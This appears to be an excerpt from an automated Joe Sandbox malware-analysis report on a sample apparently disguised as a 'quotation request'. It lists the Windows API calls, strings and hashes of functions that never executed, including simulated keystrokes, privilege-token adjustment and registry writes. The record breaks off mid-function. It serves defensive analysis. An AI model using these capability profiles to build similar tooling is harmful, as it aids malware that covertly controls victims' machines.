Non-executed Functions

Function 0105CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0105CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0105CB95
GetWindowLongW.USER32(?,000000F0), ref: 0105CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0105CC00
SendMessageW.USER32 ref: 0105CC29
_wcsncpy.LIBCMT ref: 0105CC95
GetKeyState.USER32(00000011), ref: 0105CCB6
GetKeyState.USER32(00000009), ref: 0105CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0105CCD9
GetKeyState.USER32(00000010), ref: 0105CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0105CD0C
SendMessageW.USER32 ref: 0105CD33
SendMessageW.USER32(?,00001030,?,0105B348), ref: 0105CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0105CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0105CE60
SetCapture.USER32(?), ref: 0105CE69
ClientToScreen.USER32(?,?), ref: 0105CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0105CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0105CEF5
ReleaseCapture.USER32 ref: 0105CF00
GetCursorPos.USER32(?), ref: 0105CF3A
ScreenToClient.USER32(?,?), ref: 0105CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0105CFA3
SendMessageW.USER32 ref: 0105CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0105D00E
SendMessageW.USER32 ref: 0105D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0105D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0105D06D
GetCursorPos.USER32(?), ref: 0105D08D
ScreenToClient.USER32(?,?), ref: 0105D09A
GetParent.USER32(?), ref: 0105D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0105D123
SendMessageW.USER32 ref: 0105D154
ClientToScreen.USER32(?,?), ref: 0105D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0105D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0105D20C
SendMessageW.USER32 ref: 0105D22F
ClientToScreen.USER32(?,?), ref: 0105D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0105D2B5

Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC

GetWindowLongW.USER32(?,000000F0), ref: 0105D351

Strings

@GUI_DRAGID, xrefs: 0105CE9C
F, xrefs: 0105D235

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 787a62d8808c3c6432d621793e768b41ccc8a34e4f011379853b1672c868c39b
Instruction ID: df56c47a1e80ad3d60ec41fc8919b6f65fefda8e14a3bd7ae1ee5a31adca51be
Opcode Fuzzy Hash: 787a62d8808c3c6432d621793e768b41ccc8a34e4f011379853b1672c868c39b
Instruction Fuzzy Hash: B742BF38104341AFEBA1CF29C944AABBFE9FF48350F04055AFAD5972A5C736D840EB91

Function 01057DDB Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 010584D0

Strings

%d/%02d/%02d, xrefs: 01058209

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 48e4b9f0d80bc0a19d75e112d39207a6032ceb1cb4add2df442e0c5febf02b6c
Instruction ID: afcb2fa848078c62f67661c1ef0125c4682f066b68505ef7bd3dacb7ae3259a8
Opcode Fuzzy Hash: 48e4b9f0d80bc0a19d75e112d39207a6032ceb1cb4add2df442e0c5febf02b6c
Instruction Fuzzy Hash: DF12E370501304ABEBA59F29CC49FAF7FE4EF49350F14815AFE95EA2A1DB788941CB10

Function 00FE6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FE71C3
_memset.LIBCMT ref: 00FE7539
_memmove.LIBCMT ref: 00FE76AC

Strings

[:<:]], xrefs: 00FE7479
Q\E, xrefs: 00FE7FCB
[:>:]], xrefs: 00FE7492
\b(?<=\w), xrefs: 01023773
DEFINE, xrefs: 01022103
\b(?=\w), xrefs: 01023769

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 5e3d9d375217f3e9d70c9dd70b02bd1afc846ad0307246a63876d011590cff52
Instruction ID: 746fe1334fde343f2225aebdba3e38ab5c93cacc9a851195b5c8f259b06cdd65
Opcode Fuzzy Hash: 5e3d9d375217f3e9d70c9dd70b02bd1afc846ad0307246a63876d011590cff52
Instruction Fuzzy Hash: FF93A575E04325DBDB24DF98C881BADB7F1FF48310F2581AAE985EB281E7749981DB40

Function 00FD48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00FD48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0100D665
IsIconic.USER32(?), ref: 0100D66E
ShowWindow.USER32(?,00000009), ref: 0100D67B
SetForegroundWindow.USER32(?), ref: 0100D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100D69B
GetCurrentThreadId.KERNEL32 ref: 0100D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0100D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0100D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0100D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0100D6CF
SetForegroundWindow.USER32(?), ref: 0100D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D6E7
keybd_event.USER32(00000012,00000000), ref: 0100D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D6FC
keybd_event.USER32(00000012,00000000), ref: 0100D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D70A
keybd_event.USER32(00000012,00000000), ref: 0100D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D719
keybd_event.USER32(00000012,00000000), ref: 0100D71E
SetForegroundWindow.USER32(?), ref: 0100D721
AttachThreadInput.USER32(?,?,00000000), ref: 0100D748

Strings

Shell_TrayWnd, xrefs: 0100D660

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c348a2336ba2ec4383f50df3f63ac27eee3d8800d5a63a7c02fbe9e91e08f585
Instruction ID: 809ecc09d548e7720cdef27339236a66b7e6e3e3f425693372274697a57d592a
Opcode Fuzzy Hash: c348a2336ba2ec4383f50df3f63ac27eee3d8800d5a63a7c02fbe9e91e08f585
Instruction Fuzzy Hash: 3E318071A40318BBFB312BA19C49F7F3E6CEB48B50F104055FB44EA1C1D6B95900ABB0

Function 01028310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 010287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
Part of subcall function 010287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
Part of subcall function 010287E1: GetLastError.KERNEL32 ref: 01028865

_memset.LIBCMT ref: 01028353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 010283A5
CloseHandle.KERNEL32(?), ref: 010283B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 010283CD
GetProcessWindowStation.USER32 ref: 010283E6
SetProcessWindowStation.USER32(00000000), ref: 010283F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0102840A

Part of subcall function 010281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01028309), ref: 010281E0
Part of subcall function 010281CB: CloseHandle.KERNEL32(?,?,01028309), ref: 010281F2

Strings

default, xrefs: 01028405
, xrefs: 01028362
winsta0, xrefs: 010283C8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 08ca45761781e4d792f16c57c5890a1f4037c72dd2a15e51001c8442553c4dfb
Instruction ID: a228f5214919f59d2d427a592ed0ef1d29533f1a04f5b9865d72db049e6cfde0
Opcode Fuzzy Hash: 08ca45761781e4d792f16c57c5890a1f4037c72dd2a15e51001c8442553c4dfb
Instruction Fuzzy Hash: 9A81707590022DAFEF51DFA4CC44AEE7BF8FF08304F14819AFA90A6164D7398A54DB20

Function 0103C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0103C78D
FindClose.KERNEL32(00000000), ref: 0103C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0103C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0103C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0103C844
__swprintf.LIBCMT ref: 0103C890
__swprintf.LIBCMT ref: 0103C8D3

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

__swprintf.LIBCMT ref: 0103C927

Part of subcall function 00FF3698: __woutput_l.LIBCMT ref: 00FF36F1

__swprintf.LIBCMT ref: 0103C975

Part of subcall function 00FF3698: __flsbuf.LIBCMT ref: 00FF3713
Part of subcall function 00FF3698: __flsbuf.LIBCMT ref: 00FF372B

__swprintf.LIBCMT ref: 0103C9C4
__swprintf.LIBCMT ref: 0103CA13
__swprintf.LIBCMT ref: 0103CA62

Strings

%4d, xrefs: 0103C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 0103C88A
%02d, xrefs: 0103C91B, 0103C925, 0103C973, 0103C9C2, 0103CA11, 0103CA60

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: a956c2db4d95909d0800e78e14d95d9b2525e797c6d73e1d02b1442643056274
Instruction ID: 6685b1453d26079be1cf1e76a8bc59e5b6e6106ff4b2709e8de617891672e95d
Opcode Fuzzy Hash: a956c2db4d95909d0800e78e14d95d9b2525e797c6d73e1d02b1442643056274
Instruction Fuzzy Hash: 7BA14BB2408345ABD710EFA4CC85DAFB7EDFF84704F44091AF585C6291EA79DA08DB62

Function 0103EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0103EFB6
_wcscmp.LIBCMT ref: 0103EFCB
_wcscmp.LIBCMT ref: 0103EFE2
GetFileAttributesW.KERNEL32(?), ref: 0103EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0103F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0103F026
FindClose.KERNEL32(00000000), ref: 0103F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0103F04D
_wcscmp.LIBCMT ref: 0103F074
_wcscmp.LIBCMT ref: 0103F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0103F09D
SetCurrentDirectoryW.KERNEL32(01088920), ref: 0103F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0103F0C5
FindClose.KERNEL32(00000000), ref: 0103F0D2
FindClose.KERNEL32(00000000), ref: 0103F0E4

Strings

*.*, xrefs: 0103F048

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: cecfbca9a07084417c6aa01e47b48410ebe4af8b11a6fdb5be746ae19ea142f1
Instruction ID: b9a554848958964e2a90d099c73aedb90b71b57be661ddb4e8290dcfd004e3c8
Opcode Fuzzy Hash: cecfbca9a07084417c6aa01e47b48410ebe4af8b11a6fdb5be746ae19ea142f1
Instruction Fuzzy Hash: FE31D87290121B7AEB24EBB8DC48AEFB7EC9F84260F044196F9D4D3050DB79DA44CB52

Function 01050857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01050953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0105F910,00000000,?,00000000,?,?), ref: 010509C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01050A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01050A92
RegCloseKey.ADVAPI32(?), ref: 01050DB2
RegCloseKey.ADVAPI32(00000000), ref: 01050DBF

Strings

REG_EXPAND_SZ, xrefs: 01050A2F
REG_DWORD, xrefs: 01050C83
REG_SZ, xrefs: 01050AD0
REG_QWORD, xrefs: 01050D00
REG_BINARY, xrefs: 01050D4D
REG_MULTI_SZ, xrefs: 01050B7A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 891d6139ea2626efcd80b7394ab7795bab844ba00c6a397bd34c63c4610cc092
Instruction ID: 1059f88e0a019746a0a74abb7b6b3da3efce9cfcf03c86a07f40669c3c81321c
Opcode Fuzzy Hash: 891d6139ea2626efcd80b7394ab7795bab844ba00c6a397bd34c63c4610cc092
Instruction Fuzzy Hash: C70246756046019FDB94EF18C850E2EBBE5EF89710F08885DF9899B362CB74ED01DB81

Function 0103F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0103F113
_wcscmp.LIBCMT ref: 0103F128
_wcscmp.LIBCMT ref: 0103F13F

Part of subcall function 01034385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010343A0

FindNextFileW.KERNEL32(00000000,?), ref: 0103F16E
FindClose.KERNEL32(00000000), ref: 0103F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0103F195
_wcscmp.LIBCMT ref: 0103F1BC
_wcscmp.LIBCMT ref: 0103F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0103F1E5
SetCurrentDirectoryW.KERNEL32(01088920), ref: 0103F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0103F20D
FindClose.KERNEL32(00000000), ref: 0103F21A
FindClose.KERNEL32(00000000), ref: 0103F22C

Strings

*.*, xrefs: 0103F190

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 730e537bdb521a18b8fd156fe55ebc239c1fc289c2f8f3a5e161a05f11c231e2
Instruction ID: 8525f59a75480d610ec44711d7f4ffa1cf9c83506ddce1de93d7e8dca46e5abf
Opcode Fuzzy Hash: 730e537bdb521a18b8fd156fe55ebc239c1fc289c2f8f3a5e161a05f11c231e2
Instruction Fuzzy Hash: 50311A7690021FBAEB60AE64EC48EEF77AC9F85260F144196E9C0E3090DB35DA45CB55

Function 0103A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0103A20F
__swprintf.LIBCMT ref: 0103A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0103A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0103A293
_memset.LIBCMT ref: 0103A2B2
_wcsncpy.LIBCMT ref: 0103A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0103A323
CloseHandle.KERNEL32(00000000), ref: 0103A32E
RemoveDirectoryW.KERNEL32(?), ref: 0103A337
CloseHandle.KERNEL32(00000000), ref: 0103A341

Strings

\, xrefs: 0103A247
\??\%s, xrefs: 0103A22B
:, xrefs: 0103A252

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 59b44c3ecd8cc27e27d94d6a30a3400ef0fb58c70b55d4e50f28165006794f0d
Instruction ID: 46a7ec73e7027997c50401b77b3bc51051643f8f578f746c71b34bbf155d119e
Opcode Fuzzy Hash: 59b44c3ecd8cc27e27d94d6a30a3400ef0fb58c70b55d4e50f28165006794f0d
Instruction Fuzzy Hash: 7331D4B560020AABDB21DFA4DC49FEB37BCEF89740F1041A6F688D6161E77992448B24

Function 00FE66E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

ANYCRLF), xrefs: 010212FB
NO_START_OPT), xrefs: 0102114F
ANY), xrefs: 010212DE
BSR_ANYCRLF), xrefs: 0102131E
LIMIT_MATCH=, xrefs: 01021170
BSR_UNICODE), xrefs: 01021338
CRLF), xrefs: 010212C1
LF), xrefs: 010212A4
UTF16), xrefs: 010210CF
NO_AUTO_POSSESS), xrefs: 0102112E
UCP), xrefs: 0102110D
CR), xrefs: 01021287
LIMIT_RECURSION=, xrefs: 010211FC
UTF), xrefs: 010210FA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: eba1c0a0280730b9e632dc3f62ad0107ba65989c2579118c4b54b7a558c64df2
Instruction ID: 845f90edcd985379fc0a4a8b6e2e7040ae9ebd45c39a6175577be34bfd23e2b7
Opcode Fuzzy Hash: eba1c0a0280730b9e632dc3f62ad0107ba65989c2579118c4b54b7a558c64df2
Instruction Fuzzy Hash: D572A271E00269DBDF24DF59C8807AEB7F5FF58350F1481AAE849EB281DB349A41DB90

Function 0103001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 01030097
SetKeyboardState.USER32(?), ref: 01030102
GetAsyncKeyState.USER32(000000A0), ref: 01030122
GetKeyState.USER32(000000A0), ref: 01030139
GetAsyncKeyState.USER32(000000A1), ref: 01030168
GetKeyState.USER32(000000A1), ref: 01030179
GetAsyncKeyState.USER32(00000011), ref: 010301A5
GetKeyState.USER32(00000011), ref: 010301B3
GetAsyncKeyState.USER32(00000012), ref: 010301DC
GetKeyState.USER32(00000012), ref: 010301EA
GetAsyncKeyState.USER32(0000005B), ref: 01030213
GetKeyState.USER32(0000005B), ref: 01030221

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: eea990666be577d71be7b1ef8774c52604323a161d981fdc7cc67a5ebf2be509
Instruction ID: c92e60f04e2c216c7b455325b69919e95fe1add45378d0e6740a42a88b6c7e44
Opcode Fuzzy Hash: eea990666be577d71be7b1ef8774c52604323a161d981fdc7cc67a5ebf2be509
Instruction Fuzzy Hash: 6A51FB3090678929FB75DBA888147EAFFFC9F41280F0845C9EAC2575C7DAA4978CC761

Function 010503DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010504AC

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0105054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010505E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01050822
